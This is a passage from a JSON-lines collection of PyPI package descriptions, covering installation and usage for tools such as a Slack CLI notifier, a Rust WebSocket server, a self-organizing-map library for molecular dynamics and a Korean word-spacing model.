that contains Python bindings to a C++ library to calculate the predictions of the count-min sketch and count sketches. In short, you can take advantage of C++ code to get predictions for the count-min sketch and count sketch while writing just Python!Quick SketchesInstallationUsageInstallationTo install the package, one only needs to runpip install quick_sketchesUsageConsider the following example to get the count-min sketch when there are three of one element, four of another element, and finally five of a last element. There are five levels in the sketch, and each level contains 100 counters.import quick_sketches as m\nimport numpy as np\n\na = np.array([3, 4, 5])\nm.cm_sketch_preds(5, a, 100, 1) # usually [3, 4, 5], but sometimes not![numpy array of long longs] cm_sketch_preds(int nhashes, [numpy array of long longs] np_input, ll width, int seed)takes as inputnhashes:The number of hash functions used in the sketchnp_input:The numpy array containing the frequencies of each key (note that order doesn't matter)width:The width of the sketch, or the number of entries in each row of the sketchseed:A random seed.Then, it outputs what a count-min sketch would give as predicted frequencies with that particular set of parameters, where the output prediction at index i corresponds to the key in np_input at index i.
For example, if np_input was [3, 4, 5], the output might also be [3, 4, 5], but it could not be [4, 3, 5], by the conservative nature of the sketch.[numpy array of doubles] count_sketch_preds(int nhashes, [numpy array of long longs] np_input, ll width, int seed)performs the same function for the Count-Sketch, with parameters:nhashes:The number of hash functions used in the sketchnp_input:The numpy array containing the frequencies of each key (note that order doesn't matter)width:The width of the sketch, or the number of entries in each row of the sketchseed:A random seed.Note one key difference, however: the output is indoubles, because the count-sketch takes medians, which sometimes leads to half-integer outputs!"} +{"package": "quick-slack", "pacakge-description": "Quick slackCLI tool to send message to mornitor status, notify process end, etc by slack.\ud55c\uad6d\uc5b4 README\ub294\uc5ec\uae30\ub97c \ud074\ub9ad\ud574\uc8fc\uc138\uc694.InstallIt is recommended to install using pipx because command might not work depending on virtualenv state.Install pipx$python3-mpipinstallpipxseeherefor more information about installing pipxInstall Quick Slack for global$pipxinstallquick-slackAfter complete the installation of pipx, install Quick-slack through pipxInstall Quick Slack for some environmentIf you want to install it only in a specific environment, you can install it as a normal pip.$pipinstallquick-slackUsageAdd Bot to workspaceFirst, go tohttps://api.slack.com/appsand create an app in Workspace.Then add the following permissions to the Bot Token Scope:chat:writechannels:readgroups:readim:readmpim:readusers:readusergroups:readIf you install the app in Workspace from the Install App, you will receive a Bot User OAuth Access Token starting with xoxb.Set Config$qslackconfig\nUsage:qslackconfig[OPTIONS]COMMAND[ARGS]...Showorupdateconfigs\n\nOptions:--helpShowthismessageandexit.\n\nCommands:setSetconfigurationsDefaultchannelisalwaysonlyone,soyou...showShowcurrentconfigs$ qslack config show\nslack_oauth_token : None\ndefault_channel_id : None\ndefault_mentions : None'qslack config show' command allows you to view the current config.$ qslack config set --help\nUsage: qslack config set [OPTIONS]\n\n Set configurations\n\n Default channel is always only one, so you cannot and don't need to pass default channel name and default channel id.\n Default mention format is like '@user1 @here !subteam3'. Warn you should use ! 
with custom usergroup like 'engineer'.\n\nOptions:\n --api-token TEXT Slack oauth API token start with xoxb-...\n --default-mentions TEXT Default mention user or groups\n --default-channel-name TEXT Default channel name to send message, enter\n '@username' if channel is direct message\n\n --default-channel-id TEXT Default channel id to send message\n --help Show this message and exit.$ qslack config set --api-token xoxb-1231-12312312 --default-mentions '@psj8252 @here' --default-channel-id C10100110\nSetting slack token is done.\nSetting default mentions is done.\nSetting default channel is done.You can set config as shown abovedefault-mentions are the target of mention when turning onmentionoption in using the command to send a message.default channel means the channel to which a message is sent when using the command to send a message.default channel is set by directly entering id as default-channel-id argument or channel name as default-channel-name argument.Send Message$ qslack send --help\nUsage: qslack send [OPTIONS] MESSAGE\n\n Send message to the channel\n\nOptions:\n -m, --mention If use this flag, mention default mention\n user/groups\n\n -c, --channel-name TEXT Channel name to send message, use default channel\n in config if not passed\n\n --help Show this message and exit.You can send message by usingqslack sendcommand.$ qslack send hi\nError occured in sending message!\n{'ok': False, 'error': 'invalid_auth', 'warning': 'missing_charset', 'response_metadata': {'warnings': ['missing_charset']}}If the token is incorrect, the above error may occur.qslack send hi\nError occured in sending message!\n{'ok': False, 'error': 'not_in_channel', 'warning': 'missing_charset', 'response_metadata': {'warnings': ['missing_charset']}}Bot must be added to the channel to send a message. If not, may result in errors such as 'not_in_channel' or 'channel_not_found'.If an error occurs, it is related to the slack API, so if you enter the token incorrectly or miss the permission setting, you should set the token properly and add the missing permission.Send a message based on command resultsqslack cond --help\nUsage: qslack cond [OPTIONS] COMMAND\n\n Run command and send message based on whether success command\n\nOptions:\n -s, --success TEXT Message sent if command success\n -f, --fail TEXT Message sent if command failed\n -m, --mention If use this flag, mention default mention users\n --help Show this message and exit.The command above is to send a message based on the results of the command. If exit code is 0, send the message of success argument and if not, send the message of failure argument.If you have not set up a message, do not send a message.$ qslack cond pwd -s hi -f hello\n/Users/psj8252/quick-slack\nCommand success\nSending message is done.For example, if the pwd command is successful, sends a message 'hi'.qslack cond 'bash -c \"exit 1\"' -f good\nCommand exit with 1\nSending message is done.In the above case, send the message 'good' because the exit code failed to 1.Periodically execute command and send results as a messageqslackwatch--help\nUsage:qslackwatch[OPTIONS]COMMANDExecutecommandeveryintervalandsendmessageofexcutionoutput\n\nOptions:-n,--interavalFLOATsecondstowaitbetweenupdates-m,--mentionIfusethisflag,mentiondefaultmentionusers-s,--silentIfusethisflag,ignoreoutputelseprintoutput-b,--backgroudRunthiscommandbackgroud--helpShowthismessageandexit.The command above runs the command you enter regularly and sends the result as a message. 
It can be used like a watch command in linux.$ qslack watch 'sh -c \"ls | wc -l\"' -n 3\n 13\n\n 13\n\n 13This is an example of how many files in the current directory are monitored every 3 seconds to send messages in a slack.Send a message at the end of the currently running processqslack ifend --help\nUsage: qslack ifend [OPTIONS] PROCESS_ID MESSAGE\n\n Check the process is alive in every three seconds and when the process is\n dead, send message\n\n the process_id is the id of process to mornitor. Warn this command run\n python process as backgroud so can be infinitely running if the process is\n not dead.\n\nOptions:\n -m, --mention If use this flag, mention default mention users\n -n, --interaval FLOAT seconds to wait between checking liveness\n --help Show this message and exit.When you enter a pid, sends a message to the slack at the end of the running process.$ qslack ifend 18103 \"end end\"\nStart mornitoring process 18103...\n\n[+] QuickSlack: Process 18623 end\n[+] QuickSlack: Sent messageBecause it runs as background, if the process does not shut down for a long time, the qslack command remains running.Usage in python$python3Python3.7.3(v3.7.3:ef4ec6ed12,Mar252019,16:52:21)[Clang6.0(clang-600.0.57)]ondarwinType\"help\",\"copyright\",\"credits\"or\"license\"formoreinformation.>>>fromquick_slack.low_apiimportsend_message>>>send_message(\"hihi\",mention=True){'ok':True,'channel':'CCCCCCCCCCC','ts':'1609145740.013500','message':{'bot_id':'BBBBBBBBB','type':'message','text':'<@UUUUUUU> \\nhihi','user':'U01GEA37VL1','ts':'1609145740.013500','team':'TTTTTTTTTT','bot_profile':{'id':'BBBBBBBB','deleted':False,'name':'Slack CLI','updated':1606963748,'app_id':'AAAAAAAAAA','icons':{},'team_id':'TTTTTTTTTT'}},'warning':'missing_charset','response_metadata':{'warnings':['missing_charset']}}>>>You can also use quick_slack in Python as above."} +{"package": "quickslice", "pacakge-description": "No description available on PyPI."} +{"package": "quickSms", "pacakge-description": "
Welcome to quickSms!  This is a quickSms application that can be used from the CLI on Unix systems===================================================================How to use this application1. sms 8147830733 Hi I am Dipankar2. sms -s 160by2 8147830733 Hi! Dipankar again !3. sms -s way2sms -m 8147830733 -t Yes ! Dipankar Again!!Use: -h / --help to get help---------------------------------------Author : Dipankar DuttaEmail : dutta.dipankar08@gmail.com---------------------------------------
"} +{"package": "quicksocket", "pacakge-description": "quicksocketA simple WebSocket server built in Rust usingtokio,tokio-tungstenite, andpyo3. Supports Windows, macOS, and Linux. Still unstable!pipinstallquicksocketCheck out example-usage/quicksocket_with_types.py for an example of a wrapper WebsocketServer class around the quicksocket API and also provides type annotations for e.g. autocompletion in your IDE.Not stable, a bit verbose, and a bit messy!The server listens for WebSocket connections on port50808, and currently this is not configurable. (see src/server/tokio_server.rs).quicksocket's code is originally designed for use with Ultraleap's Web Visualizer project, and as such is intended for a console python visualizer server and leverages plainprintln!s for logging purposes.At some point in the future it'll make sense to switch to some proper env logging system. Pardon the mess :)Building LocallyYou'll needRustand access to some python.exe of version 3.6 or greater.You'll also need OpenSSL. See the Ubuntu section for installation details on Ubuntu. OpenSSL is slightly trickier for Windows. You can use Chocolatey or vcpkg, or download a binary distribution of OpenSSL. You may need to set$Env:OPENSSL_DIR(PowerShell syntax) to your installation directory for your Windows build session if using Chocolatey, or a binary install, or if vcpkg isn't activated for your session. macOS should have it by default.Once Rust is installed:cargobuild--releaseThis will output an .so or a .pyd depending on your OS into thetarget/releasedirectory.To build a wheel for your python/OS combo:pipinstallmaturin\nmaturinbuildThere's CI for Windows, macOS, and Linux for Pythons 3.6 through 3.9. Check out the Actions tab for now (proper release tags coming \"soon\").Targeting builds to specific Python versionsIf you're targeting a specific python version, or if you don't have python on your PATH, you can setPYTHON_SYS_EXECUTABLEto the python executable in your machine with that version.e.g., on Windows via Git Bash:PYTHON_SYS_EXECUTABLE=/c/my/path/to/python.execargobuild--releaseUbuntuMake sure you have libssl and libpython installed:sudoapt-getinstalllibssl-dev\nsudoapt-getinstalllibpython3-devIf you encounter errors buildingpyo3, you may need to check whether it can find your python and any related python dev dependencies:https://pyo3.rs/v0.10.1/building_and_distribution.htmlTodos:Little utility HTML via github pagesCould expose this through Github Pages so it's easy for a new user to test their server usage:https://github.com/nickjbenson/quicksocket/blob/main/archive/examples/wip01_basic_websocket_client.html"} +{"package": "quicksom", "pacakge-description": "Self-Organizing MapPyTorch implementation of a Self-Organizing Map. The implementation makes possible the use of a GPU if available for\nfaster computations. It follows the scikit package semantics for training and usage of the model. It also includes\nrunnable scripts to avoid coding.Example of a MD clustering usingquicksom:Requirements and setupThe SOM object requires PyTorch installed.It has dependencies in numpy, scipy and scikit-learn and scikit-image. The MD application requires pymol to load the\ntrajectory that is not included in the dependenciesTo set up the project, we suggest using conda environments. InstallPyTorchand run :pip install quicksomSOM object interfaceThe SOM object can be created using any grid size, with a optional periodic topology. 
One can also choose optimization\nparameters such as the number of epochs to train or the batch sizeTo use it, we include three scripts to :fit a SOMto optionally build the clusters manually with a guito predict cluster affectations for new data points$ quicksom_fit -h\n\nusage: quicksom_fit [-h] [-i IN_NAME] [--pdb PDB] [--select SELECT]\n [--select_align SELECT_ALIGN] [-o OUT_NAME] [-m M] [-n N]\n [--periodic] [-j] [--n_epoch N_EPOCH]\n [--batch_size BATCH_SIZE] [--num_workers NUM_WORKERS]\n [--alpha ALPHA] [--sigma SIGMA] [--scheduler SCHEDULER]\n\noptional arguments:\n -h, --help show this help message and exit\n -i IN_NAME, --in_name IN_NAME\n Can be either a .npy file or a .dcd molecular dynamics\n trajectory. If you are providing a .dcd file, you\n should also provide a PDB and optional selections.\n --pdb PDB (optional) If using directly a dcd file, we need to add a PDB for\n selection\n --select SELECT (optional)\n Atoms to select\n --select_align SELECT_ALIGN (optional)\n Atoms to select for structural alignment\n -o OUT_NAME, --out_name OUT_NAME\n name of pickle to dump\n -m M, --m M The width of the som\n -n N, --n N The height of the som\n --periodic if set, periodic topology is used\n -j, --jax To use the jax version\n --n_epoch N_EPOCH The number of iterations\n --batch_size BATCH_SIZE (optional)\n The batch size to use\n --num_workers NUM_WORKERS (optional)\n The number of workers to use\n --alpha ALPHA (optional)\n The initial learning rate\n --sigma SIGMA (optional)\n The initial sigma for the convolution\n --scheduler SCHEDULER (optional)\n Which scheduler to use, can be linear, exp or halfYou can also use the following two scripts to use your trained SOM.$ quicksom_gui -h\n$ quicksom_predict -hThe SOM object is also importable from python scripts to use directly in your analysis pipelines :importnumpyfromquicksom.somimportSOM# Get dataX=numpy.load('contact_desc.npy')# Create SOM object and train it, then dump it as a pickle objectm,n=100,100dim=X.shape[1]n_epoch=5batch_size=100som=SOM(m,n,dim,n_epoch=n_epoch)learning_error=som.fit(X,batch_size=batch_size)som.save_pickle('som.p')# Usage on the input data, predicted_clusts is an array of length n_samples with clusters affectationssom.load_pickle('som.p')predicted_clusts,errors=som.predict_cluster(X)Using JAXJAXis an efficient array computation library\nthat enables just-in-time (jit) compilation of functions.\nWe recently enabled jax support for our tool. Jax accelerated SOM usage\nwas reported torun twice faster than using the torch backend.JAX can be installed followingthese steps.\nThen the tools usually expose a -j option to use the JAX backend.\nFor instance, try running :quicksom_fit -i data/2lj5.npy -jWe have kept a common interface for most of the function calls. You should\nnot have to adapt your scripts too much, except for the device management that\nhas a different syntax in JAX. 
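As a rough illustration of that difference (generic torch/JAX device handling, not quicksom's own interface, so the exact calls are an assumption about typical usage):

import numpy as np
import torch
import jax
import jax.numpy as jnp

x = np.random.rand(128, 10).astype("float32")

# Torch backend: choose a device object and move tensors onto it explicitly.
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
x_torch = torch.from_numpy(x).to(device)

# JAX backend: jax.devices() lists the available devices, and
# jax.device_put() places an array on a chosen one.
x_jax = jax.device_put(jnp.asarray(x), jax.devices()[0])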
For examples, look at the executable scripts.\nTo use JAX from your scripts, simply change the import in the following manner.# Classic import, to use the torch backend\nfrom quicksom.som import SOM\n# Jax import\nfrom quicksom.somax import SOMSOM training on molecular dynamics (MD) trajectoriesScripts and extra dependencies:To deal with trajectories, we use the following new libraries :Pymol,pymol-psico,MDAnalysis.\nTo set up these dependencies using conda, just type :conda install -c schrodinger pymol pymol-psico\npip install MDAnalysisFitting a SOM to an MD trajectoryIn MD trajectories, all atoms including solvant can be present, making\nthe coordinates in each frame unnecessary big and impractical. We offer\nthe possibility to only keep the relevant indices using a pymol selection,\nfor instance--select name CA. Moreover, before clustering the conformations,\nwe need to align them.Approach 1 :We used to rely on a two step process to fit a SOM to a trajectory :Create a npy file with aligned atomic coordinates of C-alpha, using an utility script :dcd2npyFit the SOM as above using this npy file.Approach 2 :In our new version of the SOM, we skip the intermediary step\nand rely on PyTorch efficient multiprocess data loading to align the data\non the fly. Moreover this approach scales to trajectories that don't fit in memory.\nIt is now the recommended approach.The two alternative sets of following commands can be applied for a MD clustering :$ quicksom_fit -i data/2lj5.dcd --pdb data/2lj5.pdb --select 'name CA' -o data/som_2lj5.p --n_iter 100 --batch_size 50 --periodic --alpha 0.5\nOR USE THE TWO-STEP PROCESS\n$ dcd2npy --pdb data/2lj5.pdb --dcd data/2lj5.dcd --select 'name CA'\n$ quicksom_fit -i data/2lj5.npy -o data/som_2lj5.p --n_iter 100 --batch_size 50 --periodic --alpha 0.5\n\n1/100: 50/301 | alpha: 0.500000 | sigma: 25.000000 | error: 397.090729 | time 0.387760\n4/100: 150/301 | alpha: 0.483333 | sigma: 24.166667 | error: 8.836357 | time 5.738029\n7/100: 250/301 | alpha: 0.466667 | sigma: 23.333333 | error: 8.722509 | time 11.213565\n[...]\n91/100: 50/301 | alpha: 0.050000 | sigma: 2.500000 | error: 5.658005 | time 137.348755\n94/100: 150/301 | alpha: 0.033333 | sigma: 1.666667 | error: 5.373021 | time 142.033695\n97/100: 250/301 | alpha: 0.016667 | sigma: 0.833333 | error: 5.855451 | time 147.203326Analysis and clustering of the map usingquicksom_gui:quicksom_gui-idata/som_2lj5.pAnalysis of MD trajectories with this SOMWe now have a trained SOM and we can use several functionalities such as clustering input data points and grouping them\ninto separate dcd files, creating a dcd with one centroid per fram or plotting of the U-Matrix and its flow.Cluster assignment of input data points:quicksom_predict-idata/2lj5.npy-odata/2lj5-sdata/som_2lj5.pThis command generates 3 files:$ ls data/2lj5_*.txt\n\ndata/2lj5_bmus.txt\ndata/2lj5_clusters.txt\ndata/2lj5_codebook.txtcontaining the data:Best Matching Unit with error for each data point - Cluster assignment - Assignment for each SOM cell of the closest\ndata point (BMU with minimal error).-1means no assignment$ head -3 data/2lj5_bmus.txt\n\n38.0000 36.0000 4.9054\n37.0000 47.0000 4.6754\n2.0000 27.0000 7.0854$ head -3 data/2lj5_clusters.txt\n\n4 9 22 27 28 32 39 43 44 45 46 48 75 77 78 92 94 98 102 119 126 127 142 147 153 154 162 171 172 180 185 189 190 191 197 206 218 223 226 227 235 245 255 265 285 286 292 299\n3 5 7 10 14 21 23 26 29 33 37 51 54 55 63 64 70 74 80 82 83 84 85 86 88 99 103 104 106 107 108 116 121 123 129 131 132 133 139 140 
146 148 150 155 159 161 163 165 170 173 179 181 183 200 209 214 217 220 221 228 229 231 237 239 240 241 247 248 250 251 256 258 260 267 275 277 278 279 287 291 293 296 297 301\n1 2 8 11 12 13 15 17 18 19 20 24 25 30 31 35 38 41 42 50 52 56 58 60 61 62 65 66 68 69 71 72 73 79 87 89 90 91 93 95 96 97 101 105 109 110 112 113 114 118 120 122 124 125 130 134 136 137 138 141 143 144 145 151 152 156 157 158 160 166 168 169 174 175 176 177 178 184 187 188 193 195 201 205 208 210 211 212 213 215 216 222 225 230 232 233 234 236 242 244 246 249 252 253 254 259 261 262 264 266 268 270 271 272 274 276 280 282 283 284 288 289 290 295 298 300Cluster extractions from the inputdcdusing thequicksom_extracttool:$ quicksom_extract -h\n\nExtract clusters from a dcd file\n quicksom_extract -p pdb_file -t dcd_file -c cluster_filequicksom_extract-pdata/2lj5.pdb-tdata/2lj5.dcd-cdata/2lj5_clusters.txt$ ls -v data/cluster_*.dcd\n\ndata/cluster_1.dcd\ndata/cluster_2.dcd\ndata/cluster_3.dcd\ndata/cluster_4.dcdExtraction of the SOM centroids from the inputdcdgrep-v\"\\-1\"data/2lj5_codebook.txt>_codebook.txt\nmdx--topdata/2lj5.pdb--trajdata/2lj5.dcd--fframes_codebook.txt--outdata/centroids.dcd\nrm_codebook.txtPlotting the U-matrix:python3-c'import pickleimport matplotlib.pyplot as pltsom=pickle.load(open(\"data/som_2lj5.p\", \"rb\"))plt.matshow(som.umat)plt.savefig(\"data/umat_2lj5.png\")'Flow analysisThe flow of the trajectory can be projected onto the U-matrix using the following command:$ quicksom_flow -h\n\nusage: quicksom_flow [-h] [-s SOM_NAME] [-b BMUS] [-n] [-m] [--stride STRIDE]\n\nPlot flow for time serie clustering.\n\noptional arguments:\n -h, --help show this help message and exit\n -s SOM_NAME, --som_name SOM_NAME\n name of the SOM pickle to load\n -b BMUS, --bmus BMUS BMU file to plot\n -n, --norm Normalize flow as unit vectors\n -m, --mean Average the flow by the number of structure per SOM\n cell\n --stride STRIDE Stride of the vectors fieldWith this toy example, we get the following plot:Data projection$ quicksom_project -h\n\nusage: quicksom_project [-h] [-s SOM_NAME] [-b BMUS] -d DATA\n\nPlot flow for time serie clustering.\n\noptional arguments:\n -h, --help show this help message and exit\n -s SOM_NAME, --som_name SOM_NAME\n name of the SOM pickle to load\n -b BMUS, --bmus BMUS BMU file to plot\n -d DATA, --data DATA Data file to projectMiscellaneousIf you run into any bug or would like to ask for a functionnality, feel\nfree to open an issue or reach out by mail.If this work is of use to you, it was published as an Application Note in\nBioinformatics. You can use the following bibtex :@article{mallet2021quicksom,\n title={quicksom: Self-Organizing Maps on GPUs for clustering of molecular dynamics trajectories},\n author={Mallet, Vincent and Nilges, Michael and Bouvier, Guillaume},\n journal={Bioinformatics},\n volume={37},\n number={14},\n pages={2064--2065},\n year={2021},\n publisher={Oxford University Press}\n}"} +{"package": "quicksong", "pacakge-description": "## quicksongThis is a very basic program for detecting birdsong in long recordings that may be contaminated with cage noise. 
It uses the same general principle employed widely in the birdsong community, but instead of having to manually tweak thresholds, a support vector machine classifier is trained using manually labeled data."} +{"package": "quickspacer", "pacakge-description": "QuickSpacer\ube60\ub978 \uc18d\ub3c4\uc640 \uc900\uc218\ud55c \uc815\ud655\ub3c4\ub97c \ubaa9\ud45c\ub85c\ud558\ub294 \ud55c\uad6d\uc5b4 \ub744\uc5b4\uc4f0\uae30 \uad50\uc815 \ubaa8\ub378\uc785\ub2c8\ub2e4.\uc774 \ub808\ud3ec\uc9c0\ud1a0\ub9ac\uc5d0 \uc788\ub294 \ubaa8\ub378\ub4e4\uc740\ubaa8\ub450\uc758 \ub9d0\ubb49\uce58\uad6d\ub9bd\uad6d\uc5b4\uc6d0 \ubb38\uc5b4 \ub9d0\ubb49\uce58(\ubc84\uc804 1.0)\ub370\uc774\ud130\ub97c \uc774\uc6a9\ud558\uc5ec \ud559\uc2b5\ud55c \ubaa8\ub378\uc785\ub2c8\ub2e4.Demo\ub370\ubaa8\ub294 Tensorflow JS\ub85c \ub9cc\ub4e4\uc5b4\uc838 \uc788\uc73c\uba70https://psj8252.github.io/quickspacer/\uc5d0\uc11c \uc0ac\uc6a9\ud574\ubcf4\uc2e4 \uc218 \uc788\uc2b5\ub2c8\ub2e4.Install & Usagepipinstallquickspacer\uc704 \uba85\ub839\uc5b4\ub85c \uc124\uce58\ud558\uc2e4 \uc218 \uc788\uc2b5\ub2c8\ub2e4.fromquickspacerimportSpacerspacer=Spacer()spacer.space([\"\ub744\uc5b4\uc4f0\uae30\ub97c\uc548\ud55c\ub098\uc05c\ub9d0\",\"\ub610\ub294 \ub744\uc5b4\uc4f0\uae30\uac00 \uc798 \ub418\uc5b4\uc788\ub294 \uc88b\uc740 \ub9d0\"])spacer.space([\"\ub744\uc5b4\uc4f0\uae30\ub97c\uc548\ud55c\ub098\uc05c\ub9d0\",\"\ub610\ub294 \ub744\uc5b4\uc4f0\uae30\uac00 \uc798 \ub418\uc5b4\uc788\ub294 \uc88b\uc740 \ub9d0\",...],batch_size=48)\uc774\ub7f0\uc2dd\uc73c\ub85c \uc0ac\uc6a9\ud558\uc2e4 \uc218 \uc788\uc2b5\ub2c8\ub2e4. spacer.space() \ud568\uc218\ub294 \ub744\uc5b4\uc4f0\uae30\uac00 \ub41c \ub9ac\uc2a4\ud2b8\ub97c \ubc18\ud658\ud569\ub2c8\ub2e4.batch_size\uc635\uc158\uc744 \uc0ac\uc6a9\ud558\uba74 batch\ub2e8\uc704\ub85c \ubb36\uc5ec \uc5f0\uc0b0\ud569\ub2c8\ub2e4.\nbatch\ub0b4\uc5d0 \uc788\ub294 \ubb38\uc7a5\ub4e4\uc740 \uac00\uc7a5 \uae34 \ubb38\uc7a5\uae38\uc774\ub97c \uae30\uc900\uc73c\ub85c \ub098\uba38\uc9c0 \ubb38\uc7a5\uc740 padding\ud558\uc5ec \uc5f0\uc0b0\uc744 \uc9c4\ud589\ud558\ubbc0\ub85c batch_size\uac00 \ub108\ubb34 \ud06c\uace0 \uae38\uc774\uac00 \uc5c4\uccad \uae34 \ubb38\uc7a5\uc774 \ub4e4\uc5b4\uc788\ub2e4\uba74 \uc804\uccb4 \ucd94\ub860 \uc18d\ub3c4\uac00 \ub290\ub824\uc9c8 \uc218 \uc788\uc2b5\ub2c8\ub2e4.\nbatch_size\ub97c \ub530\ub85c \ub118\uae30\uc9c0 \uc54a\uc73c\uba74 \uc785\ub825 \ub370\uc774\ud130 \uc804\uccb4\ub97c \ud55c \ubc88\uc5d0 \uacc4\uc0b0\ud569\ub2c8\ub2e4.fromquickspacerimportSpacerspacer=Spacer(\"somewhere/my_custom_savedmodel_dir\")spacer=Spacer(saved_model_dir=\"somewhere/my_custom_savedmodel_dir\")\ub9cc\uc57d \ubaa8\ub378\uc744 \ub530\ub85c \ud559\uc2b5\uc2dc\ud0a4\uc168\ub2e4\uba74, \uc704\uc640 \uac19\uc774 saved_model \uacbd\ub85c\ub97c \uc778\uc790\ub85c \ub118\uaca8 \uc9c1\uc811\ud559\uc2b5\ud55c \ubaa8\ub378\uc744 \uc0ac\uc6a9\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.\ubb3c\ub860 savedmodel\uc774 \ub808\ud3ec\uc9c0\ud1a0\ub9ac\uc758 scripts.convert_to_savedmodel \uc2a4\ud06c\ub9bd\ud2b8\ub97c \ud1b5\ud574 \ubcc0\ud658\ub41c \uacbd\uc6b0\ub9cc \uac00\ub2a5\ud569\ub2c8\ub2e4.fromquickspacerimportSpacer# Level 1 Default, Same as Spacer()spacer1=Spacer(level=1)# Level 2spacer2=Spacer(level=2)# Level 3spacer1=Spacer(level=3)Spacer\uc758 \uc778\uc2a4\ud134\uc2a4\ub97c \ub9cc\ub4e4 \ub54c \uc704\uc640 \uac19\uc774 level \uc778\uc790\ub97c \ub118\uaca8\uc904 \uc218 \uc788\uc2b5\ub2c8\ub2e4. 
(\uae30\ubcf8: 1) \ub808\ubca8\uc740 \ub192\uc744\uc218\ub85d \uc77c\ubc18\uc801\uc778 \ub744\uc5b4\uc4f0\uae30 \uc131\ub2a5\uc774 \ud5a5\uc0c1\ub418\uba70 \ub300\uc2e0 \uc18d\ub3c4\uac00 \ub354 \uc624\ub798\uac78\ub9bd\ub2c8\ub2e4.TrainMake Vocabpython-mscripts.make_vocab\\--input-dir[corpus_directory_path]\\--vocab-path[vocab_file_path]\uae30\ubcf8 vocab\uc740 quickspacer/resources/vocab.txt\uc5d0 \uc874\uc7ac\ud558\uc9c0\ub9cc \ub530\ub85c \ubb38\uc790\uc5f4\uc774 \ud544\uc694\ud558\uac70\ub098 \ub2e4\ub978 \uc5b8\uc5b4\uc758 \ub744\uc5b4\uc4f0\uae30 \ubaa8\ub378\uc744 \ub9cc\ub4e4 \uc608\uc815\uc774\ub77c\uba74 \uc704 \uba85\ub839\uc5b4\ub97c \ud1b5\ud574 \uc0c8\ub85c vocab \ud30c\uc77c\uc744 \ub9cc\ub4e4 \uc218 \uc788\uc2b5\ub2c8\ub2e4.Model Trainpython-mscripts.train_quickspacer\\--model-name[model_name]\\--dataset-file-path[dataset_paths]\\--output-path[output_dir_path]\ubaa8\ub378\uc740 \uc704 \uba85\ub839\uc5b4\ub85c \ud559\uc2b5\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.\ud604\uc7ac \ub808\ud3ec\uc9c0\ud1a0\ub9ac\uc5d0 \uc874\uc7ac\ud558\ub294 \ubaa8\ub378\uc740 [ConvSpacer1, ConvSpacer2, ConvSpacer3] \uc138 \uc885\ub958\uc785\ub2c8\ub2e4. model-name\uc5d0\ub294 \uc774 \uc138 \uac00\uc9c0 \uc911 \ud558\ub098\ub97c \uc785\ub825\ud569\ub2c8\ub2e4.\uac01 \ubaa8\ub378\ub9c8\ub2e4 \uc0ac\uc6a9\ud558\ub294 \ud30c\ub77c\ubbf8\ud130\uac00 \uc788\ub294\ub370 configs \ub514\ub809\ud1a0\ub9ac\uc5d0 \uae30\ubcf8 \uc124\uc815\ud30c\uc77c\ub4e4\uc774 \uc788\uc73c\uba70 \uc774\ub97c \uc218\uc815\ud574\uc11c \uc0ac\uc6a9\ud558\uba74 \ub429\ub2c8\ub2e4.dataset\uc740 UTF-8\ub85c \uc778\ucf54\ub529 \ub41c \ud14d\uc2a4\ud2b8\ud30c\uc77c \ud615\ud0dc\uc785\ub2c8\ub2e4. \ub744\uc5b4\uc4f0\uae30\uac00 \uc62c\ubc14\ub974\uac8c \ub418\uc5b4\uc788\ub294 \ubb38\uc7a5\uc774\ub77c\uace0 \uac00\uc815\ud558\uace0 \ud559\uc2b5\ud569\ub2c8\ub2e4. \uc5ec\ub7ec \ud30c\uc77c\uc744 \uc785\ub825\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4. ex) \"corpus_*.txt\"python-mscripts.train_quickspacer--help\ub97c \ubcf4\uba74 \uc5ec\ub7ec \ud559\uc2b5 parameter\uc744 \uc785\ub825\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.Deploy\ubc30\ud3ec\ub294 SavedModel\uc744 \uc774\uc6a9\ud55c \ubc30\ud3ec\uc640 Tensorflowjs\ub97c \uc774\uc6a9\ud55c \ubc30\ud3ec\uac00 \uac00\ub2a5\ud569\ub2c8\ub2e4.Deploy using SavedModelMake SavedModelpython-mscripts.convert_to_savedmodel\\--model-weight-path[model_weight_path]\\--output-path[saved_model_path]\uc704 \uba85\ub839\uc5b4\ub97c \ud1b5\ud574 \ubaa8\ub378\uc744 TF SavedModel \ud615\uc2dd\uc73c\ub85c \ubcc0\ud658\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.model-weight-path\ub294 train\uc744 \ud1b5\ud574\uc11c models\uc5d0 \uc800\uc7a5\ub41c \uacbd\ub85c\ub97c \uc785\ub825\ud558\uba74 \ub418\ub294\ub370 \"spacer-XXepoch-xxx.index\" \uc774\ub7f0 \uc2dd\uc73c\ub85c \ud30c\uc77c\uc774 \uc874\uc7ac\ud558\ub294\ub370 \"spacer-XXepoch-xxx\" \uae4c\uc9c0\ub9cc \uc785\ub825\ud569\ub2c8\ub2e4.SavedModel\uc740 \uadf8\ub300\ub85c Tensorflow\ub85c Load\ud574\uc11c \uadf8\ub300\ub85c \uc0ac\uc6a9\ud574\ub3c4 \ub418\uace0, Tensorflow serving \ub4f1\uc744 \ud1b5\ud574 API \uc11c\ubc84\ub85c Deploy\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.SavedModel Additional Descriptionconvert_to_savedmodel\ub85c \ubcc0\ud658\ud55c \ubaa8\ub378\uc740 \ub450 \uac1c\uc758 signature function\uc744 \uac00\uc9c0\uace0 \uc788\uc2b5\ub2c8\ub2e4. 
